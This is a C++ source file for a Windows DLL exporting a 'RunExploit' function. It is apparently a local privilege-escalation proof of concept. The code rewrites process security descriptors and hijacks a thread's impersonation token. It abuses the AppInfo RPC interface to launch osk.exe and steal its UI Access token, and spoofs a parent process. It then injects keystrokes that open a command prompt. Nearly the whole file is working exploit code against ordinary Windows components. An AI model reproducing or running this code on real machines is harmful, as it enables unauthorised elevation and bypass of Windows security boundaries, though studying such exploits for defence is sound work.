#include "pch.h"

#include <strsafe.h>
#include <tlhelp32.h>
#include <sddl.h>
#include <memory>
#include <vector>
#include <tchar.h>
#include <comdef.h>
#include <winternl.h>
#include "ScopedHandle.h"
#include "typed_buffer.h"
#include "Utils.h"
#include "appinfo_h.h"

#pragma comment(lib, "Rpcrt4.lib")

extern "C" void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)
{
    return((void __RPC_FAR*) malloc(cBytes));
}

extern "C" void __RPC_USER midl_user_free(void __RPC_FAR * p)
{
    free(p);
}

extern "C" NTSTATUS NTAPI NtGetNextProcess(_In_ HANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ ULONG HandleAttributes,
    _In_ ULONG Flags,
    _Out_ PHANDLE NewProcessHandle);

extern "C" NTSTATUS NTAPI NtGetNextThread(
    _In_ HANDLE ProcessHandle,
    _In_ HANDLE ThreadHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ ULONG HandleAttributes,
    _In_ ULONG Flags,
    _Out_ PHANDLE NewThreadHandle
    );

extern "C" NTSTATUS NTAPI NtSuspendProcess(HANDLE ProcessHandle);
extern "C" NTSTATUS NTAPI NtResumeProcess(HANDLE ProcessHandle);

extern "C" NTSTATUS NTAPI NtImpersonateThread(
    HANDLE ThreadHandle,
    HANDLE ThreadToImpersonate,
    PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);
extern HMODULE g_module;
extern LPWSTR g_module_name;

typedef std::unique_ptr<void, decltype(LocalFree)*> LocalFreeUniquePtr;

HANDLE FindNextProcess(LPCWSTR name)
{
    std::vector<HANDLE> thids;

    ScopedHandle snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), false);
    if (!snapshot.IsValid())
    {
        DebugPrintf("Error getting toolhelp snapshot %d\n", GetLastError());
        thids;
    }

    PROCESSENTRY32 proc = {};
    proc.dwSize = sizeof(proc);
    if (Process32First(snapshot, &proc))
    {
        do
        {
            if (_wcsicmp(proc.szExeFile, name) == 0)
            {
                HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, proc.th32ProcessID);
                if (h)
                {
                    DebugPrintf("Found %ls %d\n", name, proc.th32ProcessID);
                    return h;
                }
            }
        } while (Process32Next(snapshot, &proc));
    }

    DebugPrintf("Couldn't find target process\n");
    return nullptr;
}

LocalFreeUniquePtr GetSidFromString(const wchar_t* sid)
{
    PSID ret = nullptr;
    if (!ConvertStringSidToSid(sid, &ret))
    {
        DebugPrintf("Error converting SID %ls - %d\n", sid, GetLastError());
        ret = nullptr;
    }

    return LocalFreeUniquePtr(ret, LocalFree);
}

LocalFreeUniquePtr GetSDFromString(const wchar_t* sd)
{
    PSECURITY_DESCRIPTOR ret = nullptr;
    if (!ConvertStringSecurityDescriptorToSecurityDescriptor(sd, SDDL_REVISION_1, &ret, nullptr))
    {
        DebugPrintf("Error converting SD %ls - %d\n", sd, GetLastError());
        ret = nullptr;
    }
    return LocalFreeUniquePtr(ret, LocalFree);
}

bool SetIntegrityLevel(const ScopedHandle& token)
{
    auto sid = GetSidFromString(L"S-1-16-4096");
    if (!sid)
    {
        return false;
    }

    TOKEN_MANDATORY_LABEL label = {};
    label.Label.Sid = sid.get();
    if (!SetTokenInformation(token, TokenIntegrityLevel, &label, sizeof(label)))
    {
        DebugPrintf("Error setting integrity level %d\n", GetLastError());
        return false;
    }
    return true;
}

ScopedHandle DupToken(const ScopedHandle& token)
{
    ScopedHandle dup_token;
    if (!DuplicateTokenEx(token, TOKEN_READ, nullptr, SecurityAnonymous, TokenPrimary, dup_token.Ptr()))
    {
        DebugPrintf("Error duplicating token %d\n", GetLastError());
        return ScopedHandle();
    }

    ScopedHandle final_token;
    if (!DuplicateHandle(GetCurrentProcess(), dup_token, GetCurrentProcess(), final_token.Ptr(), TOKEN_ALL_ACCESS, FALSE, 0))
    {
        DebugPrintf("Error getting writable token %d\n", GetLastError());
        return ScopedHandle();
    }

    if (!SetIntegrityLevel(final_token))
    {
        return ScopedHandle();
    }

    return std::move(final_token);
}

ScopedHandle GetProcessToken(const ScopedHandle& process)
{
    ScopedHandle token;
    if (!OpenProcessToken(process, TOKEN_DUPLICATE | TOKEN_QUERY, token.Ptr()))
    {
        DebugPrintf("Error opening token for duplicate access %d\n", GetLastError());
        return ScopedHandle();
    }

    return DupToken(token);
}

typed_buffer_ptr<LPPROC_THREAD_ATTRIBUTE_LIST> InitializeAttributeList(PHANDLE parent)
{
    SIZE_T size = 0;
    InitializeProcThreadAttributeList(nullptr, 1, 0, &size);
    typed_buffer_ptr<LPPROC_THREAD_ATTRIBUTE_LIST> buffer(size);
    if (!InitializeProcThreadAttributeList(buffer, 1, 0, &size))
    {
        DebugPrintf("Error initializing attribute list %d\n", GetLastError());
        return typed_buffer_ptr<LPPROC_THREAD_ATTRIBUTE_LIST>();
    }

    if (!UpdateProcThreadAttribute(buffer, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, 
        parent, sizeof(*parent), nullptr, nullptr))
    {
        DebugPrintf("Error adding parent process attribute %d\n", GetLastError());
        return typed_buffer_ptr<LPPROC_THREAD_ATTRIBUTE_LIST>();
    }

    return std::move(buffer);
}

RPC_STATUS AicpCreateBindingHandle(RPC_BINDING_HANDLE* binding_handle)
{
    RPC_STATUS status;
    RPC_BINDING_HANDLE v5;
    RPC_SECURITY_QOS_V3 SecurityQOS;
    DWORD cbSid;
    RPC_WSTR StringBinding;
    RPC_BINDING_HANDLE Binding;
    PSID localSystemSid = nullptr;

    memset(&SecurityQOS, 0, sizeof(SecurityQOS));

    StringBinding = 0;
    Binding = 0;
    WCHAR protocol[] = L"ncalrpc";
    status = RpcStringBindingComposeW(nullptr, protocol, 0, nullptr, 0, &StringBinding);
    if (status == RPC_S_OK)
    {
        status = RpcBindingFromStringBindingW(StringBinding, &Binding);
        RpcStringFreeW(&StringBinding);
        if (!status)
        {
            cbSid = 68;
            localSystemSid = LocalAlloc(0x40u, 0x44u);
            if (localSystemSid)
            {
                if (CreateWellKnownSid(WinLocalSystemSid, 0, localSystemSid, &cbSid))
                {
                    SecurityQOS.Version = 3;
                    SecurityQOS.ImpersonationType = 3;
                    SecurityQOS.Capabilities = RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH;
                    SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_DYNAMIC;
                    SecurityQOS.Sid = localSystemSid;

                    status = RpcBindingSetAuthInfoExW(Binding, 0, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS);
                    if (!status)
                    {
                        v5 = Binding;
                        Binding = 0;
                        *binding_handle = v5;
                    }
                }
                else
                {
                    status = GetLastError();
                }
            }
            else
            {
                status = 8;
            }
        }
    }
    LocalFree(localSystemSid);
    if (Binding)
        RpcBindingFree(&Binding);
    return status;
}

int LaunchAdminProcess(LPCWSTR exe_file, LPCWSTR cmd_line, bool resume, LPCWSTR windows_dir, DWORD flags, LPPROCESS_INFORMATION proc_info_real)
{
    RPC_BINDING_HANDLE handle;

    APP_PROCESS_INFORMATION proc_info = { 0 };
    APP_STARTUP_INFO app_startup = { 0 };
    long elevation_type = 0;
    int res = 0;

    if (AicpCreateBindingHandle(&handle) == RPC_S_OK)
    {
        RpcTryExcept
        {
            WCHAR window_station[] = L"WinSta0\\Default";
            res = RAiLaunchAdminProcess(handle, exe_file, cmd_line, flags, CREATE_SUSPENDED | CREATE_NEW_CONSOLE | CREATE_UNICODE_ENVIRONMENT,
                windows_dir, window_station, &app_startup, 0, INFINITE, &proc_info, &elevation_type);

            if (res == 0)
            {
                proc_info_real->dwProcessId = proc_info.ProcessId;
                proc_info_real->dwThreadId = proc_info.ThreadId;
                proc_info_real->hProcess = (HANDLE)proc_info.ProcessHandle;
                proc_info_real->hThread = (HANDLE)proc_info.ThreadHandle;
                if (resume)
                {
                    ResumeThread(proc_info_real->hThread);
                }
            }
            else
            {
                DebugPrintf("Error: %d\n", res);
            }
        }
            RpcExcept(1)
        {
            ULONG ulCode = RpcExceptionCode();
            DebugPrintf("Run time reported exception 0x%lx = %ld\n",
                ulCode, ulCode);
        }
        RpcEndExcept
    }

    return res;
}

class CoInit
{
private:
    HRESULT _hr;
public:
    CoInit() {
        _hr = CoInitializeEx(nullptr, COINITBASE_MULTITHREADED);
    }
    ~CoInit() {
        CoUninitialize();
    }
    HRESULT hr()
    {
        return _hr;
    }
};

bool StartRundll32(const ScopedHandle& token, LPCWSTR EntryPoint)
{
    PROCESS_INFORMATION proc_info = {};
    STARTUPINFO start_info = {};
    start_info.cb = sizeof(start_info);
    start_info.wShowWindow = SW_SHOW;
    WCHAR desktop[] = L"WinSta0\\Default";
    start_info.lpDesktop = desktop;

    WCHAR cmdline[MAX_PATH];
    StringCbPrintf(cmdline, sizeof(cmdline), L"rundll32.exe \"%ls\",%ls Command", GetModuleFile(g_module).c_str(), EntryPoint);
    if (!CreateProcessAsUser(token, nullptr, cmdline, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &start_info, &proc_info))
    {
        DebugPrintf("Error creating low privilege process %d\n", GetLastError());
        return 0;
    }

    WaitForSingleObject(proc_info.hProcess, INFINITE);
    CloseHandle(proc_info.hProcess);
    CloseHandle(proc_info.hThread);
    return true;
}

bool StartNextProcess(LPCWSTR command_line)
{
    CoInit ci;
    if (FAILED(ci.hr()))
    {
        DebugPrintf("Error initializing COM: %08X\n", ci.hr());
        return false;
    }

    CLSID clsid;
    HRESULT hr = CLSIDFromString(L"{417976b7-917d-4f1e-8f14-c18fccb0b3a8}", &clsid);
    if (FAILED(hr))
    {
        DebugPrintf("Failed to convert CLSID: %08X\n", hr);
        return false;
    }

    DebugPrintf("Init COM\n");
    IUnknownPtr unk;
    hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER | CLSCTX_ENABLE_CLOAKING, IID_PPV_ARGS(&unk));
    if (FAILED(hr))
    {
        DebugPrintf("Failed to create object: %08X\n", hr);
        return false;
    }

    HANDLE p = FindNextProcess(L"coredpussvr.exe");
    if (!p)
    {
        DebugPrintf("Failed to find process\n");
        return false;
    }

    STARTUPINFOEX start_info = {};
    start_info.StartupInfo.cb = sizeof(start_info);
    auto attrs = InitializeAttributeList(&p);
    start_info.lpAttributeList = attrs;
    WCHAR desktop[] = L"WinSta0\\Default";
    start_info.StartupInfo.lpDesktop = desktop;
    start_info.StartupInfo.wShowWindow = SW_SHOW;

    PROCESS_INFORMATION proc_info = {};
    WCHAR cmdline[MAX_PATH];
    StringCbPrintf(cmdline, sizeof(cmdline), L"rundll32.exe \"%ls\",%ls Command", GetModuleFile(g_module).c_str(), L"RunDll32Entry");
    if (!CreateProcess(nullptr, cmdline, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT, nullptr, nullptr, &start_info.StartupInfo, &proc_info))
    {
        DebugPrintf("Error creating RunDll32 process %d\n", GetLastError());
        return false;
    }

    WaitForSingleObject(proc_info.hProcess, INFINITE);
    CloseHandle(proc_info.hProcess);
    CloseHandle(proc_info.hThread);
    TerminateProcess(p, 0);
    CloseHandle(p);
    return true;
}

void HijackImpersonationToken(HANDLE proc)
{
    ScopedHandle thread;
    NTSTATUS status = NtGetNextThread(proc, nullptr, THREAD_DIRECT_IMPERSONATION | THREAD_QUERY_LIMITED_INFORMATION, 0, 0, thread.Ptr());
    if (!NT_SUCCESS(status))
    {
        DebugPrintf("Error getting thread %08X\n", status);
        return;
    }

    HANDLE token;
    while (!OpenThreadToken(thread, TOKEN_QUERY, TRUE, &token))
    {
        Sleep(100);
    }

    DebugPrintf("Impersonating thread %d\n", GetThreadId(thread));
    SECURITY_QUALITY_OF_SERVICE sqos = {};
    sqos.Length = sizeof(sqos);
    sqos.ImpersonationLevel = SecurityImpersonation;
    sqos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
    status = NtImpersonateThread(GetCurrentThread(), thread, &sqos);
    if (!NT_SUCCESS(status))
    {
        DebugPrintf("Error impersonating thread %08X\n", status);
    }
}

extern "C" __declspec(dllexport) DWORD CALLBACK RunExploit(PVOID real_path)
{
    auto sd = GetSDFromString(L"D:(A;;GRGX;;;WD)");
    HANDLE proc;
    while (NT_SUCCESS(NtGetNextProcess(proc, PROCESS_SUSPEND_RESUME | PROCESS_QUERY_INFORMATION | WRITE_DAC, 0, 0, &proc)))
    {
        DebugPrintf("Opened PID %d\n", GetProcessId(proc));
        if (!SetKernelObjectSecurity(proc, DACL_SECURITY_INFORMATION, sd.get()))
        {
            DebugPrintf("Failed to change security for process: %d\n", GetLastError());
        }
    }

    NTSTATUS status = NtGetNextProcess(nullptr, PROCESS_SUSPEND_RESUME | PROCESS_QUERY_INFORMATION | WRITE_DAC, 0, 0, &proc);
    while (!NT_SUCCESS(status))
    {
        status = NtGetNextProcess(nullptr, PROCESS_SUSPEND_RESUME | PROCESS_QUERY_INFORMATION | WRITE_DAC, 0, 0, &proc);
    }

    status = NtSuspendProcess(proc);
    if (!NT_SUCCESS(status))
    {
        DebugPrintf("Failed to suspend process %08X\n", status);
        return 0;
    }

    DebugPrintf("Process %d Suspended.\n", GetProcessId(proc));
    HijackImpersonationToken(proc);
    NtResumeProcess(proc);

    DebugPrintf("Resumed process\n");
    StartNextProcess(L"");

    FreeLibraryAndExitThread(g_module, 0);

    return 0;
}

extern "C" __declspec (dllexport) void CALLBACK RunDll32EntryW(
    HWND hwnd,
    HINSTANCE hinst,
    LPWSTR lpCmdLine, 
    int nCmdShow 
)
{
    PROCESS_INFORMATION proc_info = {};
    int res = LaunchAdminProcess(L"c:\\windows\\system32\\osk.exe", L"osk.exe", false, L"c:\\windows", 0, &proc_info);
    if (res == 0)
    {
        ScopedHandle process(proc_info.hProcess, true);
        ScopedHandle token = GetProcessToken(process);
        if (!token.IsValid())
        {
            DebugPrintf("Couldn't open UI Access token\n");
        }
        else
        {
            DebugPrintf("Got UI access token %p\n", (HANDLE)token);
            StartRundll32(token, L"RunDll32EntryUIAccess");
        }
        if (!TerminateProcess(proc_info.hProcess, 0))
        {
            DebugPrintf("Error terminating process %d\n", GetLastError());
        }

        ResumeThread(proc_info.hThread);
    }
    else
    {
        DebugPrintf("PID: %d\nResult: %d\n", GetCurrentProcessId(), res);
    }
}

extern "C" __declspec (dllexport) void CALLBACK RunDll32EntryUIAccessW(
    HWND hwnd,
    HINSTANCE hinst,
    LPWSTR lpCmdLine,
    int nCmdShow
)
{
    INPUT is[4] = {};
    is[0].type = INPUT_KEYBOARD;
    is[0].ki.dwFlags = 0;
    is[0].ki.wVk = VK_LWIN;
    is[1].type = INPUT_KEYBOARD;
    is[1].ki.dwFlags = 0;
    is[1].ki.wVk = 0x52;
    is[2].type = INPUT_KEYBOARD;
    is[2].ki.dwFlags = KEYEVENTF_KEYUP;
    is[2].ki.wVk = VK_LWIN;
    is[3].type = INPUT_KEYBOARD;
    is[3].ki.dwFlags = KEYEVENTF_KEYUP;
    is[3].ki.wVk = 0x52;

    if (!SendInput(4, is, sizeof(INPUT)))
    {
        DebugPrintf("Error sending input %d\n", GetLastError());
    }

    Sleep(500);

    is[0].type = INPUT_KEYBOARD;
    is[0].ki.dwFlags = 0;
    is[0].ki.wVk = VK_BACK;
    is[1].type = INPUT_KEYBOARD;
    is[1].ki.dwFlags = KEYEVENTF_KEYUP;
    is[1].ki.wVk = VK_BACK;

    if (!SendInput(2, is, sizeof(INPUT)))
    {
        DebugPrintf("Error sending input %d\n", GetLastError());
    }

    is[0].type = INPUT_KEYBOARD;
    is[0].ki.dwFlags = 0;
    is[0].ki.wVk = (WORD)'C';
    is[1].type = INPUT_KEYBOARD;
    is[1].ki.dwFlags = KEYEVENTF_KEYUP;
    is[1].ki.wVk = (WORD)'C';

    if (!SendInput(2, is, sizeof(INPUT)))
    {
        DebugPrintf("Error sending input %d\n", GetLastError());
    }

    is[0].type = INPUT_KEYBOARD;
    is[0].ki.dwFlags = 0;
    is[0].ki.wVk = (WORD)'M';
    is[1].type = INPUT_KEYBOARD;
    is[1].ki.dwFlags = KEYEVENTF_KEYUP;
    is[1].ki.wVk = (WORD)'M';

    if (!SendInput(2, is, sizeof(INPUT)))
    {
        DebugPrintf("Error sending input %d\n", GetLastError());
    }

    is[0].type = INPUT_KEYBOARD;
    is[0].ki.dwFlags = 0;
    is[0].ki.wVk = (WORD)'D';
    is[1].type = INPUT_KEYBOARD;
    is[1].ki.dwFlags = KEYEVENTF_KEYUP;
    is[1].ki.wVk = (WORD)'D';

    is[2].type = INPUT_KEYBOARD;
    is[2].ki.dwFlags = 0;
    is[2].ki.wVk = VK_RETURN;
    is[3].type = INPUT_KEYBOARD;
    is[3].ki.dwFlags = KEYEVENTF_KEYUP;
    is[3].ki.wVk = VK_RETURN;

    if (!SendInput(4, is, sizeof(INPUT)))
    {
        DebugPrintf("Error sending input %d\n", GetLastError());
    }
}